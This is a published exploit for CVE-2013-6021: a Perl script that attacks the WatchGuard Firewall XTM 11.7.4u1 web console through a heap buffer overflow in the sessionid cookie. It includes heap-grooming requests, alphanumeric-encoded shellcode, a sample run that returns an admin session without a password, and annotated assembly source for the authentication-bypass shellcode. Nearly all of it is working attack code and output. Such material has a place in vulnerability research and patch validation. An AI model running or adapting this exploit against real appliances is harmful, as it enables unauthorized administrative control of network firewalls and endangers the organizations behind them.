WatchGuard Firewall XTM 11.7.4u1 - Remote Buffer Overflow

:
06.11.2013
:
WatchGuard Firewall XTM <= 11.7.4u1
:

#!/usr/bin/perl -w
# Exploit Title: WatchGuard Firewall XTM version 11.7.4u1 - Remote buffer overflow exploit ~ sessionid cookie
# Date: Oct 18 2013
# Exploit Author: st3n@funoverip.net (a.k.a. jerome.nokin@gmail.com)
# Vendor Homepage: http://www.watchguard.com
# Version: <= 11.7.4u1
# Tested on: XTMv
# CVE : CVE-2013-6021

=header
*********************************************************************
** WatchGuard Firewall XTM version 11.7.4u1 **
** Remote buffer overflow exploit ~ sessionid cookie **
*********************************************************************
** **
** Author: jerome.nokin@gmail.com **
** Blog: http://funoverip.net **
** CVE: CVE-2013-6021 **
** **
*********************************************************************
** **
** - Bug, exploit & shellcode details available on: **
** http://funoverip.net/?p=1519 **
** **
** - Decoded shellocde can be found at the end of this file **
** **
*********************************************************************
=cut


=output sample

[*] Sending HTTP ping request to https://192.168.60.200:8080 : OK. Got 'pong'
[*] Checking sessionid cookie for bad chars
[*] Checking shellcode for bad chars
[*] Heap messaging (request 1) : ...
[*] Sending authentication bypass shellcode (request 2)
[*] HTTP Response :

--------------------------------------------------------------------------------
HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: sessionid=6B8B4567327B23C6643C98696633487300000014
Date: Sun, 27 Oct 2013 21:11:38 GMT
Server: none
Content-Length: 751

<?xml version="1.0"?>
<methodResponse>
<params>
<param>
<value>
<struct>
<member><name>sid</name><value>6B8B4567327B23C6643C98696633487300000014</value></member>
<member><name>response</name><value></value></member>
<member>
<name>readwrite</name>
<value><struct>
<member><name>privilege</name><value>2</value></member>
<member><name>peer_sid</name><value>0</value></member>
<member><name>peer_name</name><value>error</value></member>
<member><name>peer_ip</name><value>0.0.0.0</value></member>
</struct></value>
</member>
</struct>
</value>
</param>
</params>
</methodResponse>
--------------------------------------------------------------------------------

[*] Over.
=cut

use warnings;
use strict;
use IO::Socket::SSL;

# host and port of the XTM web console
my $host = "192.168.60.200";
my $port = "8080";

# Shellcode (watch out bad chars)
my $shellcode =
# shellcode: bypass password verification and return a session cookie
"PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIMQJdYHfas030mQ" .
"KusPQWVoEPLKK5wtKOKOkOnkMM4HkO9okOoOePXpwuuXOsJgs4LMbWUTk1KNs04PUX" .
"eXD4tKTyvgQeZNGIaOgtptC78kM7X8VXGK6fWxnmPGL0MkzTKoVegxmYneidKNKOkO" .
"9WK5HxkNYoyoUPuP7pGpNkCpvlk9k5UPIoKO9oLKnmL4KNyoKOlKk5qx9nioioLKNu" .
"RLKNioYoMY3ttdc4NipTq4VhMYTL14NazLxPERuP30oqzMn0G54OuPmkXtyOeUtHlK" .
"sevhnkRrc8HGW47TeTwpuPEPgpNi4TwTMnNpZyuTgxKOn6K90ELPNkQU7xLKg0r4oy" .
"ctQ45TlMK35EISKOYoMYWt14MnppMfUTWxYohVk3KpuWMY0Empkw0ENXwtgpuPC0lK" .
"benpLKSpF0IWPDQ4Fh30s0Wp5PlMmCrMo3KO9olIpTUts4nic44dMnqnyPUTTHKOn6" .
"LIbeLXSVIW0EMvVb5PKw3uNt7pgpWpuPiWpEnluPWpwpGpOO0KzN34S8kOm7A";

# Shellocde max length
my $shellcode_max_len = 2000;


# set our shellcode address into EAX (expected by alpha2 encoder)
my $alpha2_ecx24 =
"\x8b\x41\x24" . # mov eax, [ecx+0x24]
"\x29\xd0" . # sub eax, edx ; (edx is updated by nopsled)
"\x83\xc0\x40" . # add eax, 0x40
"\x83\xe8\x35"; # sub eax, 0x35
# for the reader, "add eax, edx" contains bad chars.
# This is the reason why the nopsled decrement EDX and that we use "dec eax, edx"


# flush after every write
$| = 1;

# HTTP POST data for authentication request
my $login_post_data =
"<methodCall><methodName>login</methodName><params><param><value><struct><member>" .
"<name>password</name><value><string>foo</string></value></member><member>" .
"<name>user</name><value><string>admin</string></value></member></struct></value>" .
"</param></params></methodCall>";

# list of bad characters
my @badchars = (
"\x00",
"\x01", "\x02", "\x03", "\x04", "\x05", "\x06", "\x07", "\x08", "\x0a",
"\x0b", "\x0c", "\x0d", "\x0e", "\x0f", "\x10", "\x11", "\x12", "\x13",
"\x14", "\x15", "\x16", "\x17", "\x18", "\x19", "\x1a", "\x1b", "\x1c",
"\x1d", "\x1e", "\x1f",
"\x20", "\x22", "\x26", "\x27", "\x3b" # cookie delimiters
);


# function: Check input for badchars.
sub check_badchars {
my $in = shift;
my $stop = 0;
for(my $i=0; $i<length($in); $i++){
my $c = substr($in,$i,1);
if($c ~~ @badchars){
printf " - bad char '0x%02x' found\n", ord($c);
$stop = 1;
}
}
if($stop){ exit; }
}

# function: testing remote connectivity with the appliance
# send HTTP "ping" request and expect "pong" reply
sub testing_connectivity {

print "[*] Sending HTTP ping request to https://$host:$port : ";
my $sock = IO::Socket::SSL->new( PeerHost => "$host", PeerPort => "$port") or die "SSL: $!";

if($sock){
my $req =
"GET /ping HTTP/1.0\r\n" .
"Host:$host:$port" . "\r\n" .
"\r\n";

# send ping
print $sock $req;
my $resp='';
my $pong = 0;
# read answer
while (my $line = <$sock>){
if($line =~ /pong/) { $pong = 1;}
$resp .= $line;
}
# got pong ?
if($pong){
print "OK. Got 'pong'\n";
}else{
print "ERROR. Expecting 'pong' response but received :\n";
print $resp;
exit;
}
close $sock;
}else{
print "ERROR: Socket failed !\n";
exit;
}
}


# function: HTTP request used for HEAP messaging phase
sub building_request_step1 {
my $sessionid = "A" x 120; # do not overflow now
my $req =
"POST /agent/ping HTTP/1.1\r\n" .
"Host:$host:$port" . "\r\n" .
"User-Agent: " . "a" x 100 . "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0 " . "a" x 100 . "\r\n" .
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, " . "a" x 992 . "\r\n" .
"Accept-Language: en-gb,en;q=0.5" . "a" x 200 . "\r\n" .
"Cookie: sessionid=" . $sessionid . "\r\n" .
"Accept-Charset: utf-8\r\n" .
"Content-Type: application/xml\r\n" .
"Content-Length: 3\r\n" .
"\r\n" .
"foo" ;
return $req;
}

# function: HTTP request used for buffer overflow exploitation
sub building_request_step2 {

my $sessionid =
"A" x 140 . # junk
"\x44\x85" ; # off by 2 overflow to reach 0x8068544 (on the heap).
# 0x8068544 contains a "good memory chunk" which satisfy all rules

print "[*] Checking sessionid cookie for bad chars\n";
check_badchars($sessionid);

my $req =
"POST /agent/ping HTTP/1.1\r\n" .
"Host:$host:$port" . "\r\n" .
"User-Agent: " . "a" x 1879 . "\r\n" .
"Connection: keep-alive" . "a" x 22 .
"\x4a" x ($shellcode_max_len - length($shellcode) - length($alpha2_ecx24)) . # nops
$alpha2_ecx24 . # set EAX to shellcode addr
$shellcode . # shellcode
"\r\n" .
"Accept-Encoding: identity," . "b" x 1386 . "\r\n" .
"Cookie: sessionid=" . $sessionid . "\r\n" .
"Accept-Charset: utf-8\r\n" .
"Content-Type: application/xml\r\n" .
"Content-Length: " . length($login_post_data). "\r\n" .
"\r\n" .
$login_post_data ;

return $req;
}

# function: Send an HTTP request.
sub send_http_request {

my $req = shift;
my $read_answer = shift || 0;
my $http_resp='';

# Open socket
my $sock = IO::Socket::SSL->new( PeerHost => "$host", PeerPort => "$port") or die "SSL: $!";

if($sock){
print $sock $req;

# do we need the answer ?
if ($read_answer){
my $is_chunked = 0;
my $is_body = 0;
while(my $line = <$sock>){

if($line =~ /Transfer-Encoding: chunked/){
$is_chunked = 1;
next;
}

if($line eq "\r\n"){
# we reached the body
if($is_chunked){
$line = <$sock>; # chunk length
$line =~ s/\r\n//g;
$sock->read(my $data, hex($line)); # read chunk
$http_resp .= sprintf "Content-Length: %d\r\n\r\n", hex($line);
$http_resp .= $data;
close $sock ;
return $http_resp;
}
}

$http_resp .= $line;
}
}
close $sock;
}else{
print "ERROR: Socket failed !\n";
exit;
}
return $http_resp;
}



### MAIN ####


# print banner
print << 'EOF';
**********************************************************
** WatchGuard Firewall XTM version 11.7.4u1 **
** Remote buffer overflow exploit ~ sessionid cookie **
**********************************************************
** **
** Author: jerome.nokin@gmail.com **
** Blog: http://funoverip.net **
** CVE: CVE-2013-6021 **
** **
**********************************************************
** **
** Bug, exploit & shellcode details available on: **
** http://funoverip.net/?p=1519 **
** **
**********************************************************

EOF


# Send an HTTP ping request
testing_connectivity();

# building HTTP requests
my $request_step1 = building_request_step1();
my $request_step2 = building_request_step2();

# Testing shellcode against bad cahrs
print "[*] Checking shellcode for bad chars\n";
check_badchars($shellcode);

# Fillin the heap
print "[*] Heap messaging (request 1) : ";
for(my $i=0 ; $i<3 ; $i++){
send_http_request($request_step1);
print ".";
}
print "\n";

# Exploiting
print "[*] Sending authentication bypass shellcode (request 2)\n";
my $resp = send_http_request($request_step2,1);
print "[*] HTTP Response : \n\n";

print "-" x 80 . "\n";
print $resp;
print "-" x 80 . "\n\n";


print "[*] Over.\n";
exit;


=shellcode
;------------------------------------------------
; shellcode-get-gession.asm
; by Jerome Nokin for XTM(v) 11.7.4 update 1
;------------------------------------------------

global _start
_start:


; current EBP/ESP values
;-------
; esp 0x3ff0b518
; ebp 0x3ff0b558


; first, fix the stack in HTTP_handle_request function
; -------
; esp 0x3ff0b6f0
; ebp 0x3ffffcb8

; we'll do
;---------
;$ perl -e 'printf "%x\n", 0x3ff0b518 + 472'
; 3ff0b6f0
; ESP = ESP + 472
;$ perl -e 'printf "%x\n", 0x3ff0b558 + 1001312'
; 3ffffcb8
; EBP = EBP + 1001312

; fix ESP/EBP
add esp, 472
add ebp, 1001312


; fixing overwritten ptrs


; finding initial malloc pointer v50 (overwritten)
; 0805f000-08081000 rwxp 00000000 00:00 0 [heap]

; v54 and v55 have not been overwritten and contain *(v50+0x10) and *(v50+0x14)

; example inside gdb
;b *0x8051901
;b *0x80519c0
;(gdb) x/xw $ebp-0xf8 <===== v55
;0x3ffffbc0: 0x08065b90
;(gdb) x/xw $ebp-0xfc <===== v54
;0x3ffffbbc: 0x08067fe0
;(gdb) find /w 0x08060000, 0x0806ffff, 0x08067fe0, 0x08065b90 <==== search seq on heap
;0x8063b48
;1 pattern found.
;(gdb) x/xw 0x8063b48-0x10 <==== initial malloc ptr (v50) is at 0x8063b48-0x10
;0x8063b38: 0x00000001

; search this sequence on the heap
mov eax, [ebp-0xfc] ; v54
mov ebx, [ebp-0xf8] ; v55

mov edi, 0x0805f000 ; heap start addr
loop:
add edi, 4
lea esi, [edi+4]
cmp esi, 0x08081000 ; edi is out of the heap ?
je loop_end
cmp [edi], eax ; cmp v54
jne loop
cmp [edi+4], ebx ; cmp v55
je found
jmp loop

loop_end:
mov eax, 0x08063b38 ; default value (should not be reached)

found:
lea eax, [edi-0x10] ; eax = v50 address (malloc ptr addr)

; EBP-0x10c
; saved content of v50 (malloc) = ebp-0x10c
mov [ebp-0x10c], eax

; reset EBX (see following)
; 805185c: e8 95 43 00 00 call 8055bf6 <wga_signal+0x784>
; 8051861: 81 c3 93 c7 00 00 add ebx,0xc793
; ....
; 8055bf6: 8b 1c 24 mov ebx,DWORD PTR [esp]
; 8055bf9: c3 ret
mov ebx, 0x805dff4

; EBP-0x108
; just reset it to 0
mov dword [ebp-0x108], 0x0

; EBP-0x100
; 80519b1: 8b 40 0c mov eax,DWORD PTR [eax+0xc]
; 80519b4: 89 85 00 ff ff ff mov DWORD PTR [ebp-0x100],eax
mov eax, [eax+0xc]
mov [ebp-0x100], eax


; simulate call to login function. copy args
mov ecx, [ebp-0x10c]
mov eax, [ebp-0x198]
mov edx, [ebp-0x194]
mov [esp+0x4],eax
mov [esp+0x8],edx
mov [esp],ecx


; Now setup the login function stack

; current esp/ebp
; ----------------
; esp 0x3ff0b6f0
; ebp 0x3ffffcb8

; we want to land into the login function
; ---------------------------------------
; esp 0x3ff0b420
; ebp 0x3ff0b6e8

; we'll do
;---------
; $ perl -e ' printf "%x\n", 0x3ff0b6f0 - 720'
; 3ff0b420
; ESP = ESP - 720
; $ perl -e ' printf "%x\n", 0x3ffffcb8 - 1000912'
; 3ff0b6e8
; EBP = EBP - 1000912

; stack fix
sub esp, 720
sub ebp, 1000912


; EBX -> .GOT (same as above btw)
mov ebx, 0x805dff4


; simulate "decode HTTP content" fct, at top of the login function
mov edx, [ebp+0x8]
mov edx, [edx+0x8]
mov dword [esp+0x4], 0x0 ; no content_encoding header
mov [esp], edx
mov esi, 0x0804d990
call esi ; decode content
mov [ebp-0x70],eax ; int decoded_content; // [sp+258h] [bp-70h]@1


; simulate "search remote_address"
mov eax, [ebp+0x8]
mov eax, [eax+0x14]
mov [esp+0x4],eax
lea eax,[ebx-0x3ceb]
mov [esp],eax
mov esi, 0x804b670 ;FCGX_GetParam
call esi
add eax, 0x7 ; remove '::ffff:' ====> to improve
mov [ebp-0x60], eax


; is_admin = 4
mov dword [ebp-0x48], 0x4


; simulate "search req_user value"
mov eax, [ebp-0x70]
mov eax, [eax+0x50]
mov dword [esp+0x8],0x0
lea edx,[ebx-0x3c93]
mov [esp+0x4],edx
mov [esp],eax
mov esi, 0x804c07e
call esi ; <FCGX_PutStr@plt+0x3de>
mov [ebp-0x68],eax


; v49 = 2 (ipv4)
mov word [ebp-0x5a], 0x2 ; unsigned __int16 v49; // [sp+26Eh] [bp-5Ah]@1

; challenge
mov dword [ebp-0x6c], 0x0 ; const char *req_challenge; // [sp+25Ch] [bp-6Ch]@1

; set v43 to null
mov dword [ebp-0x74], 0x0 ;int v43; // [sp+254h] [bp-74h]@1


; ok, we are ready to jump in the middle of the "login" function
; right after the password verification

; jump here
; 804ee4b: c7 44 24 04 00 12 00 mov DWORD PTR [esp+0x4],0x1200
; 804ee52: 00
; 804ee53: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1
; 804ee5a: e8 11 c4 ff ff call 804b270 <calloc@plt>

mov edi, 0x804ee4b
jmp edi
=cut

CAPTCHA